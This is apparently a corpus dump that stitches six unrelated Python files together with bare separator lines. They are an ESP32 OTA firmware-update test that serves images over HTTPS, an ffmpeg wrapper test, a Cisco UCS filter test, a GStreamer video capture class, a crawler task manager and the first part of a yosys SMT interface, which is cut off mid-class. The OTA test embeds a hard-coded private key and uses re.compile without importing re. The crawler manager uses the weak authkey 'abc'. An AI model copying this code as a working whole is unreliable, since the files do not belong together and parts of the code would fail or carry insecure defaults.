import os
import socket
import BaseHTTPServer
import SimpleHTTPServer
from threading import Thread
import ssl
from tiny_test_fw import DUT
import ttfw_idf
import random
server_cert = "-----BEGIN CERTIFICATE-----\n" \
"MIIDXTCCAkWgAwIBAgIJAP4LF7E72HakMA0GCSqGSIb3DQEBCwUAMEUxCzAJBgNV\n"\
"BAYTAkFVMRMwEQYDVQQIDApTb21lLVN0YXRlMSEwHwYDVQQKDBhJbnRlcm5ldCBX\n"\
"aWRnaXRzIFB0eSBMdGQwHhcNMTkwNjA3MDk1OTE2WhcNMjAwNjA2MDk1OTE2WjBF\n"\
"MQswCQYDVQQGEwJBVTETMBEGA1UECAwKU29tZS1TdGF0ZTEhMB8GA1UECgwYSW50\n"\
"ZXJuZXQgV2lkZ2l0cyBQdHkgTHRkMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIB\n"\
"CgKCAQEAlzfCyv3mIv7TlLkObxunKfCdrJ/zgdANrsx0RBtpEPhV560hWJ0fEin0\n"\
"nIOMpJSiF9E6QsPdr6Q+eogH4XnOMU9JE+iG743N1dPfGEzJvRlyct/Ck8SswKPC\n"\
"9+VXsnOdZmUw9y/xtANbURA/TspvPzz3Avv382ffffrJGh7ooOmaZSCZFlSYHLZA\n"\
"w/XlRr0sSRbLpFGY0gXjaAV8iHHiPDYLy4kZOepjV9U51xi+IGsL4w75zuMgsHyF\n"\
"3nJeGYHgtGVBrkL0ZKG5udY0wcBjysjubDJC4iSlNiq2HD3fhs7j6CZddV2v845M\n"\
"lVKNxP0kO4Uj4D8r+5USWC8JKfAwxQIDAQABo1AwTjAdBgNVHQ4EFgQU6OE7ssfY\n"\
"IIPTDThiUoofUpsD5NwwHwYDVR0jBBgwFoAU6OE7ssfYIIPTDThiUoofUpsD5Nww\n"\
"DAYDVR0TBAUwAwEB/zANBgkqhkiG9w0BAQsFAAOCAQEAXIlHS/FJWfmcinUAxyBd\n"\
"/xd5Lu8ykeru6oaUCci+Vk9lyoMMES7lQ+b/00d5x7AcTawkTil9EWpBTPTOTraA\n"\
"lzJMQhNKmSLk0iIoTtAJtSZgUSpIIozqK6lenxQQDsHbXKU6h+u9H6KZE8YcjsFl\n"\
"6vL7sw9BVotw/VxfgjQ5OSGLgoLrdVT0z5C2qOuwOgz1c7jNiJhtMdwN+cOtnJp2\n"\
"fuBgEYyE3eeuWogvkWoDcIA8r17Ixzkpq2oJsdvZcHZPIZShPKW2SHUsl98KDemu\n"\
"y0pQyExmQUbwKE4vbFb9XuWCcL9XaOHQytyszt2DeD67AipvoBwVU7/LBOvqnsmy\n"\
"hA==\n"\
"-----END CERTIFICATE-----\n"
server_key = "-----BEGIN PRIVATE KEY-----\n"\
"MIIEvAIBADANBgkqhkiG9w0BAQEFAASCBKYwggSiAgEAAoIBAQCXN8LK/eYi/tOU\n"\
"uQ5vG6cp8J2sn/OB0A2uzHREG2kQ+FXnrSFYnR8SKfScg4yklKIX0TpCw92vpD56\n"\
"iAfhec4xT0kT6Ibvjc3V098YTMm9GXJy38KTxKzAo8L35Veyc51mZTD3L/G0A1tR\n"\
"ED9Oym8/PPcC+/fzZ999+skaHuig6ZplIJkWVJgctkDD9eVGvSxJFsukUZjSBeNo\n"\
"BXyIceI8NgvLiRk56mNX1TnXGL4gawvjDvnO4yCwfIXecl4ZgeC0ZUGuQvRkobm5\n"\
"1jTBwGPKyO5sMkLiJKU2KrYcPd+GzuPoJl11Xa/zjkyVUo3E/SQ7hSPgPyv7lRJY\n"\
"Lwkp8DDFAgMBAAECggEAfBhAfQE7mUByNbxgAgI5fot9eaqR1Nf+QpJ6X2H3KPwC\n"\
"02sa0HOwieFwYfj6tB1doBoNq7i89mTc+QUlIn4pHgIowHO0OGawomeKz5BEhjCZ\n"\
"4XeLYGSoODary2+kNkf2xY8JTfFEcyvGBpJEwc4S2VyYgRRx+IgnumTSH+N5mIKZ\n"\
"SXWNdZIuHEmkwod+rPRXs6/r+PH0eVW6WfpINEbr4zVAGXJx2zXQwd2cuV1GTJWh\n"\
"cPVOXLu+XJ9im9B370cYN6GqUnR3fui13urYbnWnEf3syvoH/zuZkyrVChauoFf8\n"\
"8EGb74/HhXK7Q2s8NRakx2c7OxQifCbcy03liUMmyQKBgQDFAob5B/66N4Q2cq/N\n"\
"MWPf98kYBYoLaeEOhEJhLQlKk0pIFCTmtpmUbpoEes2kCUbH7RwczpYko8tlKyoB\n"\
"6Fn6RY4zQQ64KZJI6kQVsjkYpcP/ihnOY6rbds+3yyv+4uPX7Eh9sYZwZMggE19M\n"\
"CkFHkwAjiwqhiiSlUxe20sWmowKBgQDEfx4lxuFzA1PBPeZKGVBTxYPQf+DSLCre\n"\
"ZFg3ZmrxbCjRq1O7Lra4FXWD3dmRq7NDk79JofoW50yD8wD7I0B7opdDfXD2idO8\n"\
"0dBnWUKDr2CAXyoLEINce9kJPbx4kFBQRN9PiGF7VkDQxeQ3kfS8CvcErpTKCOdy\n"\
"5wOwBTwJdwKBgDiTFTeGeDv5nVoVbS67tDao7XKchJvqd9q3WGiXikeELJyuTDqE\n"\
"zW22pTwMF+m3UEAxcxVCrhMvhkUzNAkANHaOatuFHzj7lyqhO5QPbh4J3FMR0X9X\n"\
"V8VWRSg+jA/SECP9koOl6zlzd5Tee0tW1pA7QpryXscs6IEhb3ns5R2JAoGAIkzO\n"\
"RmnhEOKTzDex611f2D+yMsMfy5BKK2f4vjLymBH5TiBKDXKqEpgsW0huoi8Gq9Uu\n"\
"nvvXXAgkIyRYF36f0vUe0nkjLuYAQAWgC2pZYgNLJR13iVbol0xHJoXQUHtgiaJ8\n"\
"GLYFzjHQPqFMpSalQe3oELko39uOC1CoJCHFySECgYBeycUnRBikCO2n8DNhY4Eg\n"\
"9Y3oxcssRt6ea5BZwgW2eAYi7/XqKkmxoSoOykUt3MJx9+EkkrL17bxFSpkj1tvL\n"\
"qvxn7egtsKjjgGNAxwXC4MwCvhveyUQQxtQb8AqGrGqo4jEEN0L15cnP38i2x1Uo\n"\
"muhfskWf4MABV0yTUaKcGg==\n"\
"-----END PRIVATE KEY-----\n"
def get_my_ip():
s1 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s1.connect(("8.8.8.8", 80))
my_ip = s1.getsockname()[0]
s1.close()
return my_ip
def start_https_server(ota_image_dir, server_ip, server_port):
os.chdir(ota_image_dir)
server_file = os.path.join(ota_image_dir, "server_cert.pem")
cert_file_handle = open(server_file, "w+")
cert_file_handle.write(server_cert)
cert_file_handle.close()
key_file = os.path.join(ota_image_dir, "server_key.pem")
key_file_handle = open("server_key.pem", "w+")
key_file_handle.write(server_key)
key_file_handle.close()
httpd = BaseHTTPServer.HTTPServer((server_ip, server_port),
SimpleHTTPServer.SimpleHTTPRequestHandler)
httpd.socket = ssl.wrap_socket(httpd.socket,
keyfile=key_file,
certfile=server_file, server_side=True)
httpd.serve_forever()
@ttfw_idf.idf_example_test(env_tag="Example_WIFI")
def test_examples_protocol_native_ota_example(env, extra_data):
"""
This is a positive test case, which downloads the complete binary file multiple times.
The number of iterations can be specified in the variable iterations.
steps: |
1. join AP
2. Fetch OTA image over HTTPS
3. Reboot with the new OTA image
"""
dut1 = env.get_dut("native_ota_example", "examples/system/ota/native_ota_example", dut_class=ttfw_idf.ESP32DUT)
# Number of times the application's operation is validated
iterations = 3
# File to be downloaded. This file is generated after compilation
bin_name = "native_ota.bin"
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance("native_ota_bin_size", "{}KB".format(bin_size // 1024))
ttfw_idf.check_performance("native_ota_bin_size", bin_size // 1024)
# start test
host_ip = get_my_ip()
thread1 = Thread(target=start_https_server, args=(dut1.app.binary_path, host_ip, 8002))
thread1.daemon = True
thread1.start()
dut1.start_app()
for i in range(iterations):
dut1.expect("Loaded app from partition at offset", timeout=30)
try:
ip_address = dut1.expect(re.compile(r" sta ip: ([^,]+),"), timeout=30)
print("Connected to AP with IP: {}".format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
# the daemon HTTPS server thread keeps serving across iterations
dut1.expect("Starting OTA example", timeout=30)
print("writing to device: {}".format("https://" + host_ip + ":8002/" + bin_name))
dut1.write("https://" + host_ip + ":8002/" + bin_name)
dut1.expect("Loaded app from partition at offset", timeout=60)
dut1.expect("Starting OTA example", timeout=30)
dut1.reset()
@ttfw_idf.idf_example_test(env_tag="Example_WIFI")
def test_examples_protocol_native_ota_example_truncated_bin(env, extra_data):
"""
This test case validates OTA behavior when the binary file is truncated.
The application should return an error message in this case.
steps: |
1. join AP
2. Generate truncated binary file
3. Fetch OTA image over HTTPS
4. Check working of code if bin is truncated
"""
dut1 = env.get_dut("native_ota_example", "examples/system/ota/native_ota_example", dut_class=ttfw_idf.ESP32DUT)
# Original binary file generated after compilation
bin_name = "native_ota.bin"
# Truncated binary file to be generated from original binary file
truncated_bin_name = "truncated.bin"
# Size of the truncated file to be generated. This value can range from 288 bytes (image header size) to the size of the original binary file
# truncated_bin_size is set to 64000 to reduce the time consumed by the test case
truncated_bin_size = 64000
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
f = open(binary_file, "r+")
fo = open(os.path.join(dut1.app.binary_path, truncated_bin_name), "w+")
fo.write(f.read(truncated_bin_size))
fo.close()
f.close()
binary_file = os.path.join(dut1.app.binary_path, truncated_bin_name)
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance("native_ota_bin_size", "{}KB".format(bin_size // 1024))
ttfw_idf.check_performance("native_ota_bin_size", bin_size // 1024)
# start test
host_ip = get_my_ip()
dut1.start_app()
dut1.expect("Loaded app from partition at offset", timeout=30)
try:
ip_address = dut1.expect(re.compile(r" sta ip: ([^,]+),"), timeout=60)
print("Connected to AP with IP: {}".format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
dut1.expect("Starting OTA example", timeout=30)
print("writing to device: {}".format("https://" + host_ip + ":8002/" + truncated_bin_name))
dut1.write("https://" + host_ip + ":8002/" + truncated_bin_name)
dut1.expect("native_ota_example: Image validation failed, image is corrupted", timeout=20)
@ttfw_idf.idf_example_test(env_tag="Example_WIFI")
def test_examples_protocol_native_ota_example_truncated_header(env, extra_data):
"""
This test case validates OTA behavior when the headers of the binary file are truncated.
The application should return an error message in this case.
steps: |
1. join AP
2. Generate binary file with truncated headers
3. Fetch OTA image over HTTPS
4. Check working of code if headers are not sent completely
"""
dut1 = env.get_dut("native_ota_example", "examples/system/ota/native_ota_example", dut_class=ttfw_idf.ESP32DUT)
# Original binary file generated after compilation
bin_name = "native_ota.bin"
# Truncated binary file to be generated from original binary file
truncated_bin_name = "truncated_header.bin"
# Size of the truncated file to be generated. This value should be less than 288 bytes (image header size)
truncated_bin_size = 180
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
f = open(binary_file, "r+")
fo = open(os.path.join(dut1.app.binary_path, truncated_bin_name), "w+")
fo.write(f.read(truncated_bin_size))
fo.close()
f.close()
binary_file = os.path.join(dut1.app.binary_path, truncated_bin_name)
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance("native_ota_bin_size", "{}KB".format(bin_size // 1024))
ttfw_idf.check_performance("native_ota_bin_size", bin_size // 1024)
# start test
host_ip = get_my_ip()
dut1.start_app()
dut1.expect("Loaded app from partition at offset", timeout=30)
try:
ip_address = dut1.expect(re.compile(r" sta ip: ([^,]+),"), timeout=60)
print("Connected to AP with IP: {}".format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
dut1.expect("Starting OTA example", timeout=30)
print("writing to device: {}".format("https://" + host_ip + ":8002/" + truncated_bin_name))
dut1.write("https://" + host_ip + ":8002/" + truncated_bin_name)
dut1.expect("native_ota_example: received package is not fit len", timeout=20)
@ttfw_idf.idf_example_test(env_tag="Example_WIFI")
def test_examples_protocol_native_ota_example_random(env, extra_data):
"""
This test case validates OTA behavior when the binary file consists of random data.
Magic byte verification should fail in this case.
steps: |
1. join AP
2. Generate random binary image
3. Fetch OTA image over HTTPS
4. Check working of code for random binary file
"""
dut1 = env.get_dut("native_ota_example", "examples/system/ota/native_ota_example", dut_class=ttfw_idf.ESP32DUT)
# Random binary file to be generated
random_bin_name = "random.bin"
# Size of the random binary file. 32000 is chosen to reduce the time required to run the test case
random_bin_size = 32000
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, random_bin_name)
fo = open(binary_file, "w+")
# The first byte of the binary file is always set to zero. If it were generated randomly,
# it could be 0xE9 (the valid image magic byte), which would cause the test case to fail.
fo.write(str(0))
for i in range(random_bin_size - 1):
fo.write(str(random.randrange(0,255,1)))
fo.close()
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance("native_ota_bin_size", "{}KB".format(bin_size // 1024))
ttfw_idf.check_performance("native_ota_bin_size", bin_size // 1024)
# start test
host_ip = get_my_ip()
dut1.start_app()
dut1.expect("Loaded app from partition at offset", timeout=30)
try:
ip_address = dut1.expect(re.compile(r" sta ip: ([^,]+),"), timeout=60)
print("Connected to AP with IP: {}".format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
dut1.expect("Starting OTA example", timeout=30)
print("writing to device: {}".format("https://" + host_ip + ":8002/" + random_bin_name))
dut1.write("https://" + host_ip + ":8002/" + random_bin_name)
dut1.expect("esp_ota_ops: OTA image has invalid magic byte", timeout=20)
if __name__ == '__main__':
test_examples_protocol_native_ota_example()
test_examples_protocol_native_ota_example_truncated_bin()
test_examples_protocol_native_ota_example_truncated_header()
test_examples_protocol_native_ota_example_random()
|
local_t_est.py
|
import threading
from time import sleep
from pyffmpeg import FFmpeg
ff = FFmpeg()
ff.loglevel = 'info'
def tt():
t_th = threading.Thread(target=ov)
t_th.daemon = True
t_th.start()
qq()
def qq():
sleep(3)
print(ff._ffmpeg_instances)
ff.quit('convert')
def ov():
out = ff.convert('H:\\GitHub\\pyffmpeg\\_test\\quantum.mp4', 'H:\\GitHub\\pyffmpeg\\_test\\fa.mp3')
print('done')
if ff.error:
if 'Output' in ff.error:
assert True
else:
print(ff.error)
else:
assert True
fps = ff.get_fps("H:/CS/practice/python/pyffmpeg subproces/vid.mp4")
print(fps)
# tt()
|
test_generate_filter.py
|
# Copyright 2015 Cisco Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from nose.tools import *
from ucscsdk.ucscfilter import generate_infilter
from ucscsdk.ucscxmlcodec import to_xml_str
success = True
def ls_filter():
global success
filter_ = generate_infilter(class_id="lsServer",
filter_str='(type, "instance", type="eq")',
is_meta_class_id=True)
expected = b'<filter><eq class="lsServer" property="type" ' \
b'value="instance" /></filter>'
if to_xml_str(filter_.to_xml()) != expected:
success = False
def org_filter():
global success
filter_ = generate_infilter(class_id="orgOrg",
filter_str='(descr, "oroorg", type="eq")',
is_meta_class_id=True)
expected = b'<filter><eq class="orgOrg" property="descr" ' \
b'value="oroorg" /></filter>'
if to_xml_str(filter_.to_xml()) != expected:
success = False
def test_001_not_filter():
expected = b'<filter><not><eq class="lsServer" property="dn" ' \
b'value="org-root/ls-C1_B1" /></not></filter>'
filter_str = 'not (dn,"org-root/ls-C1_B1", type="eq")'
filter_xml = generate_infilter(class_id="LsServer",
filter_str=filter_str,
is_meta_class_id=True)
xml_str = to_xml_str(filter_xml.to_xml())
assert_equal(xml_str, expected)
def test_002_multi_thread_filter():
import threading
import time
for i in range(1, 50):
if i % 2 != 0:
target = ls_filter
else:
target = org_filter
thread = threading.Thread(name=i, target=target)
thread.start()
while len(threading.enumerate()) > 1:
time.sleep(1)
assert success
def test_003_mixed_filter():
expected = b'<filter>' \
b'<not>' \
b'<or>' \
b'<eq class="lsServer" property="type" value="instance" />' \
b'<and><eq class="lsServer" property="usrLbl" ' \
b'value="lsserver" />' \
b'<not><wcard class="lsServer" property="descr" ' \
b'value="description" />' \
b'</not>' \
b'</and>' \
b'</or>' \
b'</not>' \
b'</filter>'
filter_str = 'not(' \
'(type, "instance", type="eq") or ' \
'(usr_lbl, "lsserver", type="eq") and ' \
'not(descr, "description", type="re"))'
filter_xml = generate_infilter(class_id="LsServer",
filter_str=filter_str,
is_meta_class_id=True)
xml_str = to_xml_str(filter_xml.to_xml())
assert_equal(xml_str, expected)
|
videoio.py
|
from pathlib import Path
from enum import Enum
from collections import deque
from urllib.parse import urlparse
import subprocess
import threading
import logging
import cv2
LOGGER = logging.getLogger(__name__)
WITH_GSTREAMER = True
class Protocol(Enum):
IMAGE = 0
VIDEO = 1
CSI = 2
V4L2 = 3
RTSP = 4
HTTP = 5
class VideoIO:
"""
Class for capturing from a video file, an image sequence, or a camera, and saving video output.
Encoding, decoding, and scaling can be accelerated using the GStreamer backend.
Parameters
----------
size : (int, int)
Width and height of each frame to output.
config : Dict
Camera and buffer configuration.
input_uri : string
URI to an input video file or capturing device.
output_uri : string
URI to an output video file.
proc_fps : int
Estimated processing speed. This depends on compute and scene complexity.
"""
def __init__(self, size, config, input_uri, output_uri=None, proc_fps=30):
self.size = size
self.input_uri = input_uri
self.output_uri = output_uri
self.proc_fps = proc_fps
self.camera_resolution = config['camera_resolution']
self.frame_rate = config['frame_rate']
self.buffer_size = config['buffer_size']
self.protocol = self._parse_uri(self.input_uri)
self.is_file = self.protocol == Protocol.IMAGE or self.protocol == Protocol.VIDEO
if WITH_GSTREAMER:
self.cap = cv2.VideoCapture(self._gst_cap_pipeline(), cv2.CAP_GSTREAMER)
else:
self.cap = cv2.VideoCapture(self.input_uri)
self.frame_queue = deque([], maxlen=self.buffer_size)
self.cond = threading.Condition()
self.exit_event = threading.Event()
self.capture_thread = threading.Thread(target=self._capture_frames)
ret, frame = self.cap.read()
if not ret:
raise RuntimeError('Unable to read video stream')
self.frame_queue.append(frame)
width = self.cap.get(cv2.CAP_PROP_FRAME_WIDTH)
height = self.cap.get(cv2.CAP_PROP_FRAME_HEIGHT)
self.cap_fps = self.cap.get(cv2.CAP_PROP_FPS)
self.do_resize = (width, height) != self.size
if self.cap_fps == 0:
self.cap_fps = self.frame_rate # fallback to config if unknown
LOGGER.info('%dx%d stream @ %d FPS', width, height, self.cap_fps)
if self.output_uri is not None:
Path(self.output_uri).parent.mkdir(parents=True, exist_ok=True)
output_fps = 1 / self.cap_dt
if WITH_GSTREAMER:
self.writer = cv2.VideoWriter(self._gst_write_pipeline(), cv2.CAP_GSTREAMER, 0,
output_fps, self.size, True)
else:
fourcc = cv2.VideoWriter_fourcc(*'avc1')
self.writer = cv2.VideoWriter(self.output_uri, fourcc, output_fps, self.size, True)
@property
def cap_dt(self):
# for live cameras, cap the effective capture rate at the processing rate
return 1 / self.cap_fps if self.is_file else 1 / min(self.cap_fps, self.proc_fps)
def start_capture(self):
"""
Start capturing from video file or device.
"""
if not self.cap.isOpened():
self.cap.open(self._gst_cap_pipeline(), cv2.CAP_GSTREAMER)
if not self.capture_thread.is_alive():
self.capture_thread.start()
def stop_capture(self):
"""
Stop capturing from video file or device.
"""
with self.cond:
self.exit_event.set()
self.cond.notify()
self.frame_queue.clear()
self.capture_thread.join()
def read(self):
"""
Returns the next video frame.
Returns None if there are no more frames.
"""
with self.cond:
while len(self.frame_queue) == 0 and not self.exit_event.is_set():
self.cond.wait()
if len(self.frame_queue) == 0 and self.exit_event.is_set():
return None
frame = self.frame_queue.popleft()
self.cond.notify()
if self.do_resize:
frame = cv2.resize(frame, self.size)
return frame
def write(self, frame):
"""
Writes the next video frame.
"""
assert hasattr(self, 'writer')
self.writer.write(frame)
def release(self):
"""
Closes video file or capturing device.
"""
self.stop_capture()
if hasattr(self, 'writer'):
self.writer.release()
self.cap.release()
def _gst_cap_pipeline(self):
gst_elements = str(subprocess.check_output('gst-inspect-1.0'))
if 'nvvidconv' in gst_elements and self.protocol != Protocol.V4L2:
# format conversion for hardware decoder
cvt_pipeline = (
'nvvidconv interpolation-method=5 ! '
'video/x-raw, width=%d, height=%d, format=BGRx !'
'videoconvert ! appsink sync=false'
% self.size
)
else:
cvt_pipeline = (
'videoscale ! '
'video/x-raw, width=%d, height=%d !'
'videoconvert ! appsink sync=false'
% self.size
)
if self.protocol == Protocol.IMAGE:
pipeline = (
'multifilesrc location=%s index=1 caps="image/%s,framerate=%d/1" ! decodebin ! '
% (
self.input_uri,
self._img_format(self.input_uri),
self.frame_rate
)
)
elif self.protocol == Protocol.VIDEO:
pipeline = 'filesrc location=%s ! decodebin ! ' % self.input_uri
elif self.protocol == Protocol.CSI:
if 'nvarguscamerasrc' in gst_elements:
pipeline = (
'nvarguscamerasrc sensor_id=%s ! '
'video/x-raw(memory:NVMM), width=%d, height=%d, '
'format=NV12, framerate=%d/1 ! '
% (
self.input_uri[6:],
*self.camera_resolution,
self.frame_rate
)
)
else:
raise RuntimeError('GStreamer CSI plugin not found')
elif self.protocol == Protocol.V4L2:
if 'v4l2src' in gst_elements:
pipeline = (
'v4l2src device=%s ! '
'video/x-raw, width=%d, height=%d, '
'format=YUY2, framerate=%d/1 ! '
% (
self.input_uri,
*self.camera_resolution,
self.frame_rate
)
)
else:
raise RuntimeError('GStreamer V4L2 plugin not found')
elif self.protocol == Protocol.RTSP:
pipeline = 'rtspsrc location=%s latency=0 ! decodebin ! ' % self.input_uri
elif self.protocol == Protocol.HTTP:
pipeline = 'souphttpsrc location=%s ! decodebin ! ' % self.input_uri
return pipeline + cvt_pipeline
def _gst_write_pipeline(self):
gst_elements = str(subprocess.check_output('gst-inspect-1.0'))
# use hardware encoder if found
if 'omxh264enc' in gst_elements:
h264_encoder = 'omxh264enc'
elif 'x264enc' in gst_elements:
h264_encoder = 'x264enc'
else:
raise RuntimeError('GStreamer H.264 encoder not found')
pipeline = (
'appsrc ! autovideoconvert ! %s ! qtmux ! filesink location=%s '
% (
h264_encoder,
self.output_uri
)
)
return pipeline
def _capture_frames(self):
while not self.exit_event.is_set():
ret, frame = self.cap.read()
with self.cond:
if not ret:
self.exit_event.set()
self.cond.notify()
break
# keep unprocessed frames in the buffer for file
if self.is_file:
while (len(self.frame_queue) == self.buffer_size and
not self.exit_event.is_set()):
self.cond.wait()
self.frame_queue.append(frame)
self.cond.notify()
@staticmethod
def _parse_uri(uri):
result = urlparse(uri)
if result.scheme == 'csi':
protocol = Protocol.CSI
elif result.scheme == 'rtsp':
protocol = Protocol.RTSP
elif result.scheme == 'http':
protocol = Protocol.HTTP
else:
if '/dev/video' in result.path:
protocol = Protocol.V4L2
elif '%' in result.path:
protocol = Protocol.IMAGE
else:
protocol = Protocol.VIDEO
return protocol
@staticmethod
def _img_format(uri):
suffix = Path(uri).suffix[1:]
return 'jpeg' if suffix == 'jpg' else suffix
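# --- Illustrative sketch (not part of the original module) ---
# Exercises the URI parsing helper without opening any capture device or GStreamer
# pipeline. All URIs below are made-up examples.
if __name__ == '__main__':
    for example_uri in ('csi://0', 'rtsp://camera.local/stream', '/dev/video0',
                        'frames/%06d.jpg', 'clip.mp4'):
        print(example_uri, '->', VideoIO._parse_uri(example_uri))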
|
taskmanager.py
|
# -*- coding:utf-8 -*-
################# Distributed crawler demo: manager ###########################
from spider import wpd
import threading
import random, time, Queue,logging
import dill
from multiprocessing.managers import BaseManager
# Define a handler that prints INFO-and-above log records to sys.stderr
console = logging.StreamHandler()
# Set the log message format
formatter = logging.Formatter('%(asctime)s -[%(threadName)s] - %(levelname)s - %(message)s')
console.setFormatter(formatter)
# Attach the configured console handler to the logger
logger = logging.getLogger('manager')
logger.setLevel(logging.INFO)
logger.addHandler(console)
# QueueManager subclass derived from BaseManager:
class QueueManager(BaseManager):
pass
def make_server_manager():
# Queue for dispatching tasks:
task_queue = Queue.Queue()
# Queue for receiving results:
result_queue = Queue.Queue()
# Register both queues on the network; the callable argument binds each Queue object:
QueueManager.register('get_task_queue', callable=lambda: task_queue)
QueueManager.register('get_result_queue', callable=lambda: result_queue)
# Bind to port 5000 and set the authkey to 'abc':
manager = QueueManager(address=('127.0.0.1', 5000), authkey='abc')
# Start the manager:
manager.start()
t1 = threading.Thread(target=startTask, name='TaskQueue',args=(manager,))
t2 = threading.Thread(target=startresultQueue, name='ResultQueue',args=(manager,))
t1.start()
t2.start()
# t1.join()
# t2.join()
def startTask(manager):
# Initialize the spider
spider1 = wpd.Wpd()
# Obtain the network-accessible task queue object:
task = manager.get_task_queue()
# Number of pages to crawl:
page =10
n=1
while page>=n:
logger.info(u'读取第 %d页....' % n)
n += 1
imgs = spider1.getPageItems(n)
for v in imgs:
# n = random.randint(0, 10000)
logger.info(u'下载任务放入队列 %s...' % v)
task.put(v)
# Read results from the result queue:
def startresultQueue(manager):
result = manager.get_result_queue()
logger.info(u'尝试获取下次结果...')
while True:
try:
r = result.get(timeout=10)
logger.info(u'结果: %s' % r)
except Queue.Empty:
logger.warning('result queue is empty.')
# Shut down:
manager.shutdown()
if __name__=='__main__':
make_server_manager()
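# --- Illustrative worker-side sketch (not part of the original demo) ---
# A separate worker process would connect to the manager above, pull download tasks
# from the task queue and push results back. The address, port and authkey mirror the
# values hard-coded in make_server_manager(); the download step is a placeholder.
#
# class WorkerQueueManager(BaseManager):
#     pass
#
# WorkerQueueManager.register('get_task_queue')
# WorkerQueueManager.register('get_result_queue')
# worker = WorkerQueueManager(address=('127.0.0.1', 5000), authkey='abc')
# worker.connect()
# task, result = worker.get_task_queue(), worker.get_result_queue()
# while True:
#     try:
#         img_url = task.get(timeout=10)
#         result.put('downloaded %s' % img_url)
#     except Queue.Empty:
#         break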
|
smtio.py
|
#
# yosys -- Yosys Open SYnthesis Suite
#
# Copyright (C) 2012 Clifford Wolf <clifford@clifford.at>
#
# Permission to use, copy, modify, and/or distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
#
import sys, re, os, signal
import subprocess
if os.name == "posix":
import resource
from copy import deepcopy
from select import select
from time import time
from queue import Queue, Empty
from threading import Thread
# This is needed so that the recursive SMT2 S-expression parser
# does not run out of stack frames when parsing large expressions
if os.name == "posix":
smtio_reclimit = 64 * 1024
smtio_stacksize = 128 * 1024 * 1024
smtio_stacklimit = resource.RLIM_INFINITY
if os.uname().sysname == "Darwin":
# MacOS has rather conservative stack limits
smtio_stacksize = 16 * 1024 * 1024
smtio_stacklimit = resource.getrlimit(resource.RLIMIT_STACK)[1]
if sys.getrecursionlimit() < smtio_reclimit:
sys.setrecursionlimit(smtio_reclimit)
if resource.getrlimit(resource.RLIMIT_STACK)[0] < smtio_stacksize:
resource.setrlimit(resource.RLIMIT_STACK, (smtio_stacksize, smtio_stacklimit))
# currently running solvers (so we can kill them)
running_solvers = dict()
forced_shutdown = False
solvers_index = 0
def force_shutdown(signum, frame):
global forced_shutdown
if not forced_shutdown:
forced_shutdown = True
if signum is not None:
print("<%s>" % signal.Signals(signum).name)
for p in running_solvers.values():
# os.killpg(os.getpgid(p.pid), signal.SIGTERM)
os.kill(p.pid, signal.SIGTERM)
sys.exit(1)
if os.name == "posix":
signal.signal(signal.SIGHUP, force_shutdown)
signal.signal(signal.SIGINT, force_shutdown)
signal.signal(signal.SIGTERM, force_shutdown)
def except_hook(exctype, value, traceback):
if not forced_shutdown:
sys.__excepthook__(exctype, value, traceback)
force_shutdown(None, None)
sys.excepthook = except_hook
hex_dict = {
"0": "0000", "1": "0001", "2": "0010", "3": "0011",
"4": "0100", "5": "0101", "6": "0110", "7": "0111",
"8": "1000", "9": "1001", "A": "1010", "B": "1011",
"C": "1100", "D": "1101", "E": "1110", "F": "1111",
"a": "1010", "b": "1011", "c": "1100", "d": "1101",
"e": "1110", "f": "1111"
}
class SmtModInfo:
def __init__(self):
self.inputs = set()
self.outputs = set()
self.registers = set()
self.memories = dict()
self.wires = set()
self.wsize = dict()
self.clocks = dict()
self.cells = dict()
self.asserts = dict()
self.covers = dict()
self.anyconsts = dict()
self.anyseqs = dict()
self.allconsts = dict()
self.allseqs = dict()
self.asize = dict()
class SmtIo:
def __init__(self, opts=None):
global solvers_index
self.logic = None
self.logic_qf = True
self.logic_ax = True
self.logic_uf = True
self.logic_bv = True
self.logic_dt = False
self.forall = False
self.produce_models = True
self.smt2cache = [list()]
self.p = None
self.p_index = solvers_index
solvers_index += 1
if opts is not None:
self.logic = opts.logic
self.solver = opts.solver
self.solver_opts = opts.solver_opts
self.debug_print = opts.debug_print
self.debug_file = opts.debug_file
self.dummy_file = opts.dummy_file
self.timeinfo = opts.timeinfo
self.unroll = opts.unroll
self.noincr = opts.noincr
self.info_stmts = opts.info_stmts
self.nocomments = opts.nocomments
else:
self.solver = "yices"
self.solver_opts = list()
self.debug_print = False
self.debug_file = None
self.dummy_file = None
